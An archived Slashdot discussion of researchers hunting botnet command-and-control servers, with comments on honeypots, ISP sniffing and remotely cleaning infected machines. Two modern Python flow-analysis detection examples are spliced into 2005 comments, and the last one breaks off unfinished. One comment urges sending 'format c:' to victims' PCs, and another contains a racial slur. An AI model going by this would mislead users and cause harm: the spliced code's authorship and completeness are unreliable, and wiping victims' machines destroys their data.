Slashdot: News for Nerds

Hunting for Botnet Command and Controls

Zonk posted more than 9 years ago | from the owning-the-punkz dept.

Security 228

Uky writes "Convinced that the recent upswing in virus and Trojan attacks is directly linked to the creation of botnets for nefarious purposes, a group of high-profile security researchers is fighting back, vigilante-style. The objective of the group, which operates on closed, invite-only mailing lists, is to pinpoint and ultimately disable the C&C (command-and-control) infrastructure that sends instructions to millions of zombie drone machines hijacked by malicious hackers." From the article: "Using data from IP flows passing through routers and reverse-engineering tools to peek under the hood of new Trojans, Thompson said the researchers are able to figure out how the botnet owner sends instructions to the compromised machines."


228 comments

Botnet (3, Funny)

TimeTraveler1884 (832874) | more than 9 years ago | (#12858505)

Now only if they could do this with Skynet, we might just be able to postpone Judgement Day another 6 years.

Re:Botnet (1, Troll)

The Illegal Pirates (840709) | more than 9 years ago | (#12858933)

Dear Sir or Madam:

We, the Illegal Pirates of the Internet Who Must Steal Everything No Matter What, run a vast botnet using sophisticated command and control schemes that will remain impervious to your primitive nonsense. We have thousands of servers constantly swapping vast stores of copyrighted information, and nothing can stop us. Nothing! muahahahahahahahhaha

Signed,
The Illegal Pirates of the Internet Who Must Steal Everything No Matter What

p.s. No we're not using stupid comments on slashdot as encoded messages to our botnets

Own3d. (-1, Flamebait)

Anonymous Coward | more than 9 years ago | (#12858510)

One time, an OpenBSD box of mine got own3d by some script kiddie and, as the box was unattended for months, was admitted as a node in some script kiddie IRC network. After some playing around and modifying the ircd placed on my server to make me unkickable, I made myself a global operator and fucked with their whole network. Stupid script-niggers.

Re:Own3d. (0)

Anonymous Coward | more than 9 years ago | (#12858700)


Liar.

Uh oh! (1)

neonenergy (888041) | more than 9 years ago | (#12858515)

uh, time for me to disconnect to the internets for a while.

Easy way to catch them. (3, Insightful)

Elshar (232380) | more than 9 years ago | (#12858523)

Easiest way is to create a small IRC network, and submit the name to all the irc clients out there, so it'll be in the list. Also, name it something so it appears at the top or near the top...

To inflate user counts, just get an ircd that allows assigning yourself or others fake hostnames (for certain hosts/etc). Then load tons of bots in channels pretending to be 'users'. You could even get creative and make them idly chatter with each other..

Anyways, the point is that most of these botnet peoples eventually want to take a part of their net out to go mess with irc channels, and they usually seem to target smaller networks on the top of whatever list they're using.. So all ya gotta do if just log massive joins into certain channels, or when a flood of users magically connect to your fake network.. Then you have tons of bots to dissect or whatever.

Re:Easy way to catch them. (0)

Anonymous Coward | more than 9 years ago | (#12858551)

Ummm, what? Anybody else able to make any sense of Elshar's ramblings?

Re:Easy way to catch them. (2, Informative)

Nasarius (593729) | more than 9 years ago | (#12858613)

I think he's proposing that you run your own IRC network as a honeypot and hope that bot authors use it. Seems kinda inefficient.

Re:Easy way to catch them. (0)

Anonymous Coward | more than 9 years ago | (#12858661)

If you haven't figured it out yet, 90% of the posters on slashdot don't know what the hell they are talking about when it comes to technology.

Once upon a time slashdot was filled with very technically inclined people. Now it's just wanna-be's and has-beens. The magic is gone.

Re:Easy way to catch them. (1)

empaler (130732) | more than 9 years ago | (#12858680)

Um. Yes. Maybe?
I think he is (a) trying to be punny or (b) just doesn't get that it has nothing to do with the bots he's used to chatting with.

Re:Easy way to catch them. (2, Informative)

coekie (603995) | more than 9 years ago | (#12858688)

Finding them really is not the problem. Opers have nice tools/services for that (at least on some big networks), drone connection/channel detection notices scrolling by as fast as you can read...
It's the dissecting and cleaning part that's hard, and getting harder and harder as kiddies are getting "smarter".

Re:Easy way to catch them. (1)

WilliamSChips (793741) | more than 9 years ago | (#12858771)

You could even get creative and make them idly chatter with each other..
The results of that are disastrous. Go look up the thing that happened when two ALICEbots were hooked up to each other.

Re:Easy way to catch them. (2, Informative)

Keruo (771880) | more than 9 years ago | (#12858932)

Nice idea, but you're ~2 years late.
Modern spam zombies use p2p network to send messages back and forth, they aren't controlled from centralized irc servers anymore.

The article discusses decoding the control messages sent between the bots in their own network, and how to take control of them, and possibly shutting them down.

C&C attacks work well for military (1, Interesting)

puzzled (12525) | more than 9 years ago | (#12858526)


C&C attacks are the staple of today's military. An organized, centralized effort should do wonders for laying waste to the economic value (and motivation) behind such behavior.

Re:C&C attacks work well for military (5, Funny)

CrazyJim1 (809850) | more than 9 years ago | (#12858634)

C&C attacks are the staple of today's military. An organized, centralized effort should do wonders for laying waste to the economic value (and motivation) behind such behavior.

The best way to lay waste to someone's economic power in C&C is to destroy their harvesters. Make sure not to send infantry units because they'll suffer tiberium poisoning, or merely be run over by the harvester. Another great way to wreak havoc is to send the engineer into the harvesting facility as the harvester is unloading, you'll get the building, harvester and the tiberium that's being unloaded at the time. Of course, many believe engineering cheese is the cheap way to play C&C, but of course there are too many cheesy plays to count in that game. I suggest you play something like Starcraft. Or Starcraft2, which I have a chance of actually helping with.

Re:C&C attacks work well for military (1)

puzzled (12525) | more than 9 years ago | (#12858716)


I play Civilization II (yes, I am old, deal with it) and the computer players are easily fooled - don't place cities where the best resources are, place them on mountains with resources at their backs and then provoke, provoke, provoke - war costs nothing from a mountain top until armor is developed.

Nah, TA was better (0)

Anonymous Coward | more than 9 years ago | (#12858989)

In TA, in a skirmish game against computer controlled opponents, you build a basic airbase, send over as many lifters as you can build fast, and capture the enemy commander/s.
Then you have free range to build an impenetrable base in peace before releasing them to inevitable defeat.

Bwahahahaha etc....

And then what? (0)

Anonymous Coward | more than 9 years ago | (#12858529)

How do they disable the C&C infrastructure?

Re:And then what? (1)

Ezdaloth (675945) | more than 9 years ago | (#12858555)

Let the military handle that. They have nice tanks that can blow any infrastructure you tell them to.

Re:And then what? (0)

Anonymous Coward | more than 9 years ago | (#12858590)

They have nice tanks that can blow any infrastructure you tell them to.

Oh that lucky, lucky infrastructure.

Re:And then what? (0)

Anonymous Coward | more than 9 years ago | (#12858556)

Send an allied spy into the enemy powerplant, or use V3 rockets to take out the power plant from extreme range, or use Yuri Prime to take over and sell the powerplant. IT'S NOT ROCKET SCIENCE PEOPLES!

Violation of My Privacy? (4, Interesting)

reporter (666905) | more than 9 years ago | (#12858532)

"Using data from IP flows passing through routers and reverse-engineering tools to peek under the hood of new Trojans, Thompson said the researchers are able to figure out how the botnet owner sends instructions to the compromised machines."

When the security "experts" are busy looking at all the data passing through routers, who is busy ensuring that the "experts" will not violate my privacy by reading the personal but sensitive e-mail notes that I send to my friends and associates?

In other words, when the "experts" are protecting me from the hackers, who is protecting me from the "experts"?

Re:Violation of My Privacy? (5, Insightful)

TCM (130219) | more than 9 years ago | (#12858543)

When the security "experts" are busy looking at all the data passing through routers, who is busy ensuring that the "experts" will not violate my privacy by reading the personal but sensitive e-mail notes that I send to my friends and associates?

You, by encrypting them.

Re:Violation of My Privacy? (0)

Seumas (6865) | more than 9 years ago | (#12858732)

Encryption is virtual admission of guilt.

Re:Violation of My Privacy? (1)

civilizedINTENSITY (45686) | more than 9 years ago | (#12858759)

Bullshit. It should be considered improper to the point of being anti-social to not use encryption. You wouldn't say that a firewall was an admission of guilt, or that having a lock on your front door was an admission of guilt.

Re:Violation of My Privacy? (0, Troll)

Seumas (6865) | more than 9 years ago | (#12858778)

What Amerika do you live in?!

Re:Violation of My Privacy? (1)

PyWiz (865118) | more than 9 years ago | (#12858936)

That's probably because a firewall and a lock are designed to keep intruders OUT, not to keep your stuff IN away from people who might read it. Perhaps a better example: would you say sending your snail mail via a confidential courier in a sealed envelope is anti-social? No, but it's not an admission of guilt either.

Re:Violation of My Privacy? (1)

civilizedINTENSITY (45686) | more than 9 years ago | (#12858985)

What about locks on your car? Or if you want to use the snail mail comparison, consider that it is illegal to "sniff" your neighbor's snail mail. It isn't illegal to "sniff" their email, nor to listen to their cordless phone conversations. Would you say that legislation that protects our snail mail is an "admission of guilt?" Nope.

Re:Violation of My Privacy? (0, Troll)

Red Alastor (742410) | more than 9 years ago | (#12858972)

Encryption is virtual admission of guilt.

Decide, do you want to hide that information or you don't ? If you have nothing to hide, why does it bother you that someone could intercept your communication ?

Re:Violation of My Privacy? (1)

wokithub (723753) | more than 9 years ago | (#12859075)

what about stuff like credit card numbers, social security numbers and other personal info? isn't that worth encrypting? you may have nothing to "hide" but still not want any asshole out on the net nabbing anything he can about you

Re:Violation of My Privacy? (3, Informative)

wcdw (179126) | more than 9 years ago | (#12858578)

At every company/ISP there are people who have the ability, and regularly do, delve into the data streams flowing through the routers. And yes, sometimes they read your letter to Aunt Martha (or worse).

Mostly the volume of data involved is so large that trying to monitor it without filtering for the items of interest is usually impossible. And that filter is your best defense, in this particular situation.

Unless, of course, you're sending Aunt Martha that e-mail over IRC....

Re:Violation of My Privacy? (1)

puzzled (12525) | more than 9 years ago | (#12858857)

Long, long ago, at a now defunct provider, there was this long haired hacker type. This was back when everyone was on dialup in the mid nineties and ISPs still had hubs in their core. He dug a bit into the CuSeeMe protocols and made an 'observer'. There were people running a video stream on that ISP and chat via AOL with a second modem for purposes which I now blush to recall ... you can DL 10x worse these days, but it was quite a shock in 1995.

Re:Violation of My Privacy? (5, Insightful)

justforaday (560408) | more than 9 years ago | (#12858584)

Does it come as a surprise to you that people that have access to routers can sniff your packets?

Re:Look (1)

redzebra (238754) | more than 9 years ago | (#12858693)

Does it come as a surprise to you that people that have access to routers can sniff your packets?

Of course they can but the question is : are they allowed to do it ? It's very easy to tap a phone call in any exchange but admitting you did it without the proper legal papers would get you in a whole lot of trouble, I guess.

Re:Look (1)

civilizedINTENSITY (45686) | more than 9 years ago | (#12858782)

Well you might have signed a contract that stipulated you wouldn't sniff in order to purchase your connection. But I don't think there are laws related to sniffing like there would be for telephones. More like using a radio to listen to your neighbor's cordless phone conversations, which is both legal and provides admissable info. No expectation of privacy there. So the better cordless phones do encryption. Cellphones have an expectation of privacy. But email is like old time CB.

Re:Look (1)

redzebra (238754) | more than 9 years ago | (#12858901)

Well, luring the bots on your own net and analysing them there seems fine. So that would be more or less the same as receiving broadcasted things.

However they talk about a bunch of experts calling themselves the good guys and playing vigilante. (Which in itself is already a bit worrying)

Further on they talk about actively sniffing routers. If an ISP admits it monitors traffic contents wouldn't it then lose its rights as being a "carrier"? Wouldn't that make them responsible for the content too, illegal content for example?

Re:Look (1)

civilizedINTENSITY (45686) | more than 9 years ago | (#12859003)

I know my University monitors student use, including browsing and email. Whether that makes them responsible, I don't know. But don't get caught using P2P software (regardless of what you download) or you'll lose your connection. No servers of *any* kind, be they ftp, ssh, mail, or http. P2P is viewed as a type of server. So is bittorrent.

Re:Look (1)

autocracy (192714) | more than 9 years ago | (#12858955)

Happens frequently. Line workers just tap right onto your loop... Central office folks can do the same.. or they can use the functions in the switch. They often do so...

Re:Look (1)

redzebra (238754) | more than 9 years ago | (#12858994)

yes it happens, yes it's as easy as reading one's mail if you're at the right place. It doesn't make it legal though and can get you in serious trouble if you admit doing it.

Yes. (1)

benjamindees (441808) | more than 9 years ago | (#12858987)

It should. There are wiretapping laws against this. It's no different than the phone company listening in on your conversations.

Re:Violation of My Privacy? (2, Insightful)

pete6677 (681676) | more than 9 years ago | (#12859040)

I'd say the grandparent poster is aware of this, but just wanted to take advantage of the opportunity to bitch about his privacy since it got him a guaranteed +5 Insightful on Slashdot.

Re:Violation of My Privacy? (1, Informative)

Anonymous Coward | more than 9 years ago | (#12858644)

As a provider, I can ask: Exactly what privacy do you expect beyond the TOS agreement you clicked/signed to gain access to my network?

The Wiretap Act "Provider Exception" 18 U.S.C 2511(2)(a)(i) [cybercrime.gov] enables the network, or those working for the network, to snoop on any traffic.

So, if you don't like that, you're free to make your own internet. As someone who operates networks, I can assure you, unless you're doing something that violates my TOS, I have better things to do with my time than read your crappy e-mail, and posts to /.

Re:Violation of My Privacy? (1)

Saeed al-Sahaf (665390) | more than 9 years ago | (#12858679)

I have better things to do with my time than read your crappy e-mail, and posts to /.

Obviously not.

Re:Violation of My Privacy? (4, Informative)

deep44 (891922) | more than 9 years ago | (#12858650)

When the security "experts" are busy looking at all the data passing through routers, who is busy ensuring that the "experts" will not violate my privacy by reading the personal but sensitive e-mail notes that I send to my friends and associates?
Umm.. they're not looking at "all the data passing through routers". Flow data is a sampling of information (source, dest, proto, port, etc) from a designated collection point. Even without the actual "data" portion of the packet, it's impractical to collect anything more than a small percentage of the total traffic.

So you can put the gun down- your privacy is safe.
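Added example (not from the article, and not deep44's or Elshar's code): what "looking at flow data" actually means in practice. The input is constructed NetFlow-style records with exactly the fields deep44 lists (time, source, destination, protocol, port, byte count) and no payload, so nobody's e-mail is being read. The sample traffic, the IRC-port endpoint 203.0.113.5 and the inside host addresses are all made up for the example. Fan-in (many inside hosts talking to one outside endpoint) is the flow-level version of Elshar's "log massive joins" idea above, but on its own it also flags any popular web server, so the example adds the check a practitioner would want: whether each source contacts that endpoint on a fixed timer, which bots do and browsers don't.

```python
from collections import defaultdict
from dataclasses import dataclass
from statistics import mean, pstdev


@dataclass(frozen=True)
class Flow:
    """One flow record: the fields a NetFlow/IPFIX exporter gives you, no payload."""
    ts: float   # flow start, seconds since an arbitrary epoch
    src: str
    dst: str
    dport: int
    proto: str
    nbytes: int


def _beacons(src, dst, dport, start, intervals, nbytes=120):
    """Build a series of flows from src to dst:dport at the given inter-arrival gaps."""
    t = start
    out = [Flow(t, src, dst, dport, "tcp", nbytes)]
    for gap in intervals:
        t += gap
        out.append(Flow(t, src, dst, dport, "tcp", nbytes))
    return out


# Constructed sample (not real traffic): four inside hosts check in with an
# IRC-port endpoint about once a minute; the same hosts also browse an HTTPS
# site at irregular times. Addresses are documentation ranges, chosen here.
SAMPLE_FLOWS = (
    _beacons("10.0.0.11", "203.0.113.5", 6667, 0, [60, 61, 59, 60])
    + _beacons("10.0.0.12", "203.0.113.5", 6667, 7, [60, 61, 59, 60])
    + _beacons("10.0.0.13", "203.0.113.5", 6667, 15, [60, 61, 59, 60])
    + _beacons("10.0.0.14", "203.0.113.5", 6667, 22, [60, 61, 59, 60])
    + _beacons("10.0.0.11", "198.51.100.7", 443, 3, [12, 103, 1, 279], nbytes=48000)
    + _beacons("10.0.0.12", "198.51.100.7", 443, 40, [500], nbytes=9100)
    + _beacons("10.0.0.13", "198.51.100.7", 443, 90, [5, 600, 7], nbytes=31000)
    + [Flow(200, "10.0.0.14", "198.51.100.7", 443, "tcp", 2200)]
)


def fan_in(flows):
    """Map each (dst, dport) endpoint to the set of distinct sources contacting it."""
    sources = defaultdict(set)
    for f in flows:
        sources[(f.dst, f.dport)].add(f.src)
    return sources


def beacon_cv(timestamps):
    """Coefficient of variation of the inter-arrival gaps; near 0 means a fixed timer.
    Returns None when fewer than 3 flows exist, since two points give one gap."""
    ts = sorted(timestamps)
    if len(ts) < 3:
        return None
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    m = mean(gaps)
    return pstdev(gaps) / m if m > 0 else None


def find_cc_candidates(flows, min_sources=3, max_cv=0.2):
    """Return [((dst, dport), regular_source_count)] for endpoints that at least
    min_sources inside hosts contact on a regular timer (gap CV <= max_cv).
    Fan-in alone is not enough: a busy web server has high fan-in too, but its
    clients do not come back on a schedule."""
    per_pair = defaultdict(list)
    for f in flows:
        per_pair[(f.src, f.dst, f.dport)].append(f.ts)

    candidates = []
    for (dst, dport), srcs in fan_in(flows).items():
        if len(srcs) < min_sources:
            continue
        regular = 0
        for s in srcs:
            cv = beacon_cv(per_pair[(s, dst, dport)])
            if cv is not None and cv <= max_cv:
                regular += 1
        if regular >= min_sources:
            candidates.append(((dst, dport), regular))
    return sorted(candidates, key=lambda c: -c[1])


if __name__ == "__main__":
    for (dst, dport), n in find_cc_candidates(SAMPLE_FLOWS):
        print(f"possible C&C {dst}:{dport} - {n} inside hosts beaconing on a timer")
```

On the constructed sample the HTTPS endpoint has the same fan-in (four hosts) as the IRC-port one, but none of its clients score as regular, so only 203.0.113.5:6667 is reported. On real exporters you would feed this from sampled records and tune `max_cv` to the sampling rate, since sampling adds jitter of its own; a flagged endpoint is a lead for the honeypot/reverse-engineering step the article describes, not a verdict.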

Re:Violation of My Privacy? (1)

LiquidCoooled (634315) | more than 9 years ago | (#12858779)

I was imagining something like the Matrix.

Where trained hacks can look deep into the flowing code and decipher it visually.

Re:Violation of My Privacy? (2, Insightful)

Cross-Threaded (893172) | more than 9 years ago | (#12858664)

You bring up a reasonable concern.

However, when you click SEND from whatever email client you use, you are essentially flinging a postcard out of your 10th story window.

Said postcard contains:

_

*your sensitive information* | Address of your friend/associate

P.S. If you are not the intended recipient, please give me to someone else closer to the address.

_

If you are truly concerned about some "expert" taking the time to read whatever it is that you have to say to a friend, or associate, then you should investigate either encrypting your messages, or use a different medium of communication.

Re:Violation of My Privacy? (1, Insightful)

Anonymous Coward | more than 9 years ago | (#12858707)

>> When the security "experts" are busy looking at all the data passing through routers

>> In other words, when the "experts" are protecting me from the hackers, who is protecting me from the "experts"?

Wrong. Reverse engineering of malware does not involve sniffing traffic indiscriminately. By looking at the binary's assembly code the totality of the backdoor protocol can be determined. For those with less skills, examining the network traffic going from/to a single sacrificial "goat" machine running VMware at either the host level or the network level can also yield usable information.

Sniffing random traffic of unrelated machines is not a standard or even useful practice when conducting malware analysis.

Are you talking about cocks, balls, and vaginas? (1)

CyricZ (887944) | more than 9 years ago | (#12858742)

What sort of things are you discussing with your friends and associates? Are you talking about penises, scrotums and vaginas? Well, are you?

Seriously, you need to protect yourself. Don't depend on others to protect you while you're on the Internet. That's why you do certain things like not running Windows, run a solid, well-tested Linux or *BSD firewall, and practice encryption of all of your communication. The power of the Internet includes many responsibilities: one of those responsibilities is to ensure your own safety by taking the appropriate measures.

Re:Violation of My Privacy? (1)

Gerald (9696) | more than 9 years ago | (#12858755)

Don't worry. Your personal email isn't that interesting.

Re:Violation of My Privacy? (1, Funny)

Anonymous Coward | more than 9 years ago | (#12858788)

Your sig is ironic considering your post.

Re:Violation of My Privacy? (2, Funny)

MavEtJu (241979) | more than 9 years ago | (#12858799)

That should have been:

Don't worry. Your personal email wasn't that interesting.

Re:Violation of My Privacy? (3, Funny)

puzzled (12525) | more than 9 years ago | (#12858836)


I've owned a couple of ISPs and I currently do service for a regional provider. If I cared to look I could see everything - your best defense is the same reason that you don't get dates - what you do is just not that interesting to anyone else.

Re:Violation of My Privacy? (1)

timerider (14785) | more than 9 years ago | (#12858962)

if your email is so sensitive, and you value your privacy so much, why didn't you use gpg to encrypt it?

besides, it was all lies in it anyways.

pessimistic (4, Insightful)

moz25 (262020) | more than 9 years ago | (#12858537)

So is this news something to be pessimistic about or what? As I understand it, without vigilantes botnets would be even more "unstoppable" than they are now. It's cool that they're mitigating it, but it really comes down to getting some cooperation going on multiple levels... starting with the ISPs acting more against outgoing malicious traffic for a start.

Botnet commanders aren't the problem (0)

Anonymous Coward | more than 9 years ago | (#12858541)

They will be here as long as there are vulnerable machines and zombies.

ps
Slow Down Cowboy!
Slashdot requires you to wait between each successful posting of a comment to allow everyone a fair chance at posting a comment.
It's been 7 minutes since you last successfully posted a comment
DA FUQ

Shutting down botnets is a pointless effort.. (4, Insightful)

Alascom (95042) | more than 9 years ago | (#12858549)

The problem isn't botnets, the problem is people and systems. The only reason botnets exist is due to the fact that current software is engineered without much thought toward security, and vendor supplied patches are not applied. Shutting down a botnet is at most only minimally worth the effort as the hosts are still vulnerable to be acquired by the next virus that comes around.

The only solution is secure software engineering and prompt, reliable patching.

Re:Shutting down botnets is a pointless effort.. (3, Insightful)

sweetooth (21075) | more than 9 years ago | (#12858616)

and until then we'll just let the botnets run rampant....

Unfortunately that's not a very good solution. While creating more secure software from the ground up is definitely the way to go for the future, you have to have some plan to deal with the current problems. Keep in mind that the vast majority of people aren't going to upgrade to the latest and greatest OS, web browser, or whatever if their existing one works. So even after you've got more secure computing solutions out there you have to convince people it's worth the time and more specifically, cost, of upgrading.

Re:Shutting down botnets is a pointless effort.. (1)

daviq (888445) | more than 9 years ago | (#12858633)

like using macs...

Re:Shutting down botnets is a pointless effort.. (1)

Illserve (56215) | more than 9 years ago | (#12858757)

This approach is even less effective than that.

All they are doing is shutting down a rogue IRC channel. The boss merely has to switch to a new one. It probably takes about 5 seconds of effort.

But they have to do something.

Re:Shutting down botnets is a pointless effort.. (1)

rpozz (249652) | more than 9 years ago | (#12858816)

Yes, the less vulnerable systems there are, the harder it is to create a botnet, and the less effective the DoS attacks.

Personally, I'm in favour of some sort of simple built-in software DRM that by default only lets 'certified' executables run, and obviously can be turned off by people who know what they're doing.

Re:Shutting down botnets is a pointless effort.. (1)

Grakun (706100) | more than 9 years ago | (#12859048)

Personally, I'm in favour of some sort of simple built-in software DRM that by default only lets 'certified' executables run, and obviously can be turned off by people who know what they're doing.

The problem with that is that it is too restrictive and/or too annoying for your typical user to leave on. Even if they can't figure out how to disable it, they'll ask someone else. Or someone else will disable it while using their computer.

Personally, I'm in favor of holding people responsible for gross negligence. If you're going to purposely setup your computer so that it aids criminals, even when you know it's wrong, then you should be held responsible for aiding criminals. It irritates me when people say they don't care about the trojans and spyware on their machines, as long as they don't notice them. The problem is that the careless users aren't affected by the machines they infect, the servers they DoS, or the systems they hack. We need to start holding them responsible for their actions, so they can't just say "It doesn't hurt me any."

vigilantes? (0)

Anonymous Coward | more than 9 years ago | (#12858552)

How can this possibly fail?

Who cares really (-1, Flamebait)

Anonymous Coward | more than 9 years ago | (#12858561)

I'm a Windows owner. I download stuff all the time. I disabled my antivirus. Windows is still trying to install critical updates from 2004.

I ran adaware once and it came up with 400 some hits. But really, who cares. As long as I don't notice a slow down on my machine, I don't give a shit who owns it or what they do with it.

If they cause me trouble, then I might be arsed to take action (like adware. Spyware is ok, adware, not so much).

But it doesn't hurt anyone else much either as I'm on a 56k line. Oh, scary DOS coming from that.

Re:Who cares really (2, Insightful)

moz25 (262020) | more than 9 years ago | (#12858623)

But it doesn't hurt anyone else much either as I'm on a 56k line. Oh, scary DOS coming from that.

What you're saying shows the root of the problem and why it's so hard to solve: you need some level of cooperation from people who do not have a direct interest in solving it simply because it doesn't affect them. Sure, your little 56k is quite harmless, but with 1000 zombies on little 56 lines, you can create quite a flood.

The other problem is with using up bandwidth allotments. Let's say the attacker is using 2KB/s for flooding. You won't notice that, but the other end wastes 5GB/month. Now if you have just 200 56k lines on pumping this on average, you'll be driving the target into unwanted bandwidth bills for sure. Now this analysis is making some assumptions, but you get the picture.

Re:Who cares really (2, Informative)

rpozz (249652) | more than 9 years ago | (#12858794)

This isn't flamebait, he's making a point.

Most 'normal' users really don't seem to give a damn if their computer is being hijacked, as long as they don't notice it. And the same users won't understand that their 56k line is one of many, which adds up to an enormous amount of bandwidth.

Who cares? Nobody. (2, Interesting)

matts-reign (824586) | more than 9 years ago | (#12858968)

I know a user who I'm certain his system is totally 0wn3d. It's an unpatched windows 98 machine, no firewall, nothing. I put an EICAR string on his machine, and 6 months later, it's still there. He calls them "Cheezy Viruses that don't hurt me" if they don't interfere with his day-to-day operations. Only when he got a dialer and built up $10,000 worth of phone bills one month did he care. The moral of the story: Users don't give a damn. I know a guy who happens to run a rather large botnet and he says 90% of his victims know there is a virus on their computers, they just can't be arsed to do anything about it.

kudos (1)

spamchang (302052) | more than 9 years ago | (#12858581)

it's great that industry, when faced with a lack of effort from the law and legislature, has the will and wherewithal to go after the scumbags. it's a great first step to show policymakers how much of a concern this is to internet security.

Re:kudos (2, Insightful)

Mysticalfruit (533341) | more than 9 years ago | (#12858961)

The main reason for this is that nobody in power has been afflicted by this.

The moment one of these BotNet's decides to DDOS the servers at the capitol building or start attacking other aspects of the US internet infrastructure, your congressman isn't going to give a shit.

The internet and the laws governing it are the wildwest at the moment. Some corners have very strong laws, other corners have none. However, if I remember it was the vigilantes who took care of the areas that strong law hadn't come into play.

Vigilante groups are a double edged sword. Laws generally aren't as agile as a group of people working for the common good. However, there is a danger that any group of people once given power is generally averse to giving it up. Also the argument about what "common good" is gets nebulous. We all agree that child porn sites should be taken down and their proprietors chucked into wood chippers. What happens when you get a vigilante group that feels that all porn sites are bad?

Told Ya So (2, Interesting)

Anonymous Coward | more than 9 years ago | (#12858597)

Internet ages ago, when DDOS was hot and researchers all concentrated on that threat, I tried to tell them that DDOS is nothing. Stuart and the others wrote their paper and based the threat on DDOS which influences computer security research even today. I predicted what is now called botnets would be the more frightening destination of the DDOS train. I didn't catch that IRC would be the covert channel of choice (not very covert). HTTPS seemed much more likely to me - net admins expect to see https traffic.
The vigilantes are running into the problem of cut-outs. The original botnets for DDOS all used a three-tier architecture - slaves (bots), masters (IRC servers), and clients. The current incarnation seems to have at least that many layers if not more. Killing the masters is better than trying to stomp on all the bots, but that still leaves the clients. Until the owners of the compromised boxen acting as masters allow access to track back to the clients, the vigilantes are facing the fate of Sisyphus.

Goetz - AC because I can't remember my /. user name

Self destruct the botnets? (5, Interesting)

dyftm (880762) | more than 9 years ago | (#12858614)

What would be really interesting is if using a combination of honeypot PCs (to match trojans to controllers) and the commands used to control the botnets, these vigilantes could make the zombified PCs download and run a cleaning tool to rid themselves of the trojan.

Re:Self destruct the botnets? (2, Informative)

Zocalo (252965) | more than 9 years ago | (#12858726)

If you are going down that road, then you would have to simply go ahead and do it, which makes you no different than the scum that put it there in the first place in the eyes of the law. Now, in theory, you could pop up a message that says "Your PC has been compromised... You need to do X, Y & Z." and be safe from the law. The snag is that most of the people whose PCs are members of botnets are probably the same ones who are used to seeing pop-ups of that form telling them to drop $30 on some shitty piece of software that just installs more malware.

Going after the controlling servers of the bot-net however, while it is definitely still a legal grey area, is less likely to get you a jail sentence and/or a fine. There are also viable approaches that wouldn't break the law at all, although they are probably not going to deliver results if the server is with certain "bullet proof hosting" providers who just don't care about abuse reports. In any case, it's still a game of Whack-a-Mole, only by going after the servers you are essentially playing with 10,000 mallets simultaneously...

Re:Self destruct the botnets? (0)

Anonymous Coward | more than 9 years ago | (#12858919)

Fuck it. Send a command to run format c:

If people can't clean their systems, they'll just have to lose all their email and digital pictures.

Re:Self destruct the botnets? (1)

Zocalo (252965) | more than 9 years ago | (#12859060)

If people can't clean their systems, they'll just have to lose all their email and digital pictures.

That thought has crossed my mind on several occasions when some bot on my local segment has been hammering my firewall and a quick NMAP reveals that, big surprise, NetBIOS and RPC are wide open. The price you pay for connecting via an ISP that doesn't treat their customers like idiots, even though some of them quite obviously are... So far, I've managed to resist the temptation, but boy, is it ever getting harder to do so!

Let's face it, mass mailing trojans have been mainstream news for some time now, yet people *still* fall for them. And I don't mean emails that just require you to download them into a badly written email client, I mean the dumb kind where the recipient has to run the attachment sent to them by a total stranger themselves. Are they living under a rock, because even non-PC using members of my family have brought this issue up with me in conversation? Deleting all their email and digital pictures, and making it clear how and why it was done of course, may be the only way of giving them the whack up the back of the head with a clue-by-four they so desperately need.

Re:Self destruct the botnets? (3, Interesting)

coekie (603995) | more than 9 years ago | (#12858729)

Which is exactly what *does* happen a lot. This is a "hobby" of many "vigilantes".
Some drones have built-in uninstall commands, others have commands to download and execute programs, so cleaners are written.
But the drones are getting more and more advanced, and built-in uninstall commands are getting rarer... it is clearly a battle that cannot be won if only fought this way.

Re:Self destruct the botnets? (1)

mabhatter654 (561290) | more than 9 years ago | (#12858843)

The idea is to figure out where the masters come from or, better yet, what the commands look like... then program the router to drop those packets. That effectively cuts the masters off wherever they may be! This is grey-hat BOFH stuff at its best!

Brilliant individuals (0)

Anonymous Coward | more than 9 years ago | (#12858635)

They aren't going to accomplish anything. It'll take forever to figure out where the HUGE botnets on IRC are located...

What causes botnets? (2, Interesting)

Anonymous Coward | more than 9 years ago | (#12858636)

Well, obviously script kiddies with the malice and idiocy to create them. But also, the end users ... the people who irresponsibly leave their machine open to the 'net, get 0wned, and then contribute to whatever DoS is going on.
These end users just *don't care*. Because, although their owned boxen are f-ing with the rest of the internet, it doesn't affect them - a selfish luser attitude, why should they bother virus/trojan scanning their boxen?
I wish ISPs would hold the lusers (criminally) responsible for this. I for one look after my home datacentre, including my Gentoo Linux boxen and keep them patched.

Re:What causes botnets? (0)

Anonymous Coward | more than 9 years ago | (#12858727)

Trying to get your customers thrown in jail is not a good business model. Ideally the government would deal with it, but this will never happen in the US where people think any kind of government intervention is the work of Satan (unless it involves invading a Middle Eastern country)

Re:What causes botnets? (1)

mabhatter654 (561290) | more than 9 years ago | (#12858859)

Seriously, without serious network software how could a normal user even prove they WEREN'T hacked... more than that, are there ANY tools that let networks REQUEST users to modify behavior... not the BOFH type "pull the plug" but responsible tools that monitor the connection quality and report back things that are suspicious so the user can fix them?

It'd be a great OSS project and a great firefox plugin!!
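The monitoring tool wished for above, and the article's own method of working from IP flows seen at routers, both come down to the same question: which external endpoint is a large number of local machines talking to on a fixed schedule? The block below is an added example written for this page, not code from the article, the researchers or any commenter. It assumes flow records already reduced to (timestamp, source, destination, destination port, bytes) tuples and a monitored range of 10.0.0.0/8; the flow data inside it is constructed, with six hosts checking in to one IRC port every 60 seconds and some ordinary web traffic for contrast. An endpoint is reported when it has many distinct local clients and most of them connect at regular intervals. The reported endpoint is what you would then feed into a router filter or an abuse report.

```python
"""Flag candidate botnet C&C endpoints from router flow records.

Added example for this discussion; not the article's or the group's code.
Assumes NetFlow-like records already reduced to plain tuples.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network
from statistics import mean, pstdev

INTERNAL = ip_network("10.0.0.0/8")  # assumption: the monitored LAN range


def constructed_flows():
    """Constructed sample flows: (unix_time, src, dst, dst_port, bytes)."""
    base = 1_700_000_000
    flows = []
    # six hosts checking in to the same external IRC port every 60 seconds
    for i in range(1, 7):
        for k in range(5):
            flows.append((base + 60 * k + i, f"10.0.0.{i}", "203.0.113.7", 6667, 120))
    # two hosts browsing one web server at irregular times (benign)
    for t in (3, 47, 101, 350):
        flows.append((base + t, "10.0.0.1", "198.51.100.10", 443, 4800))
    for t in (10, 12, 400):
        flows.append((base + t, "10.0.0.2", "198.51.100.10", 443, 9100))
    # a one-off fetch from another external host (benign)
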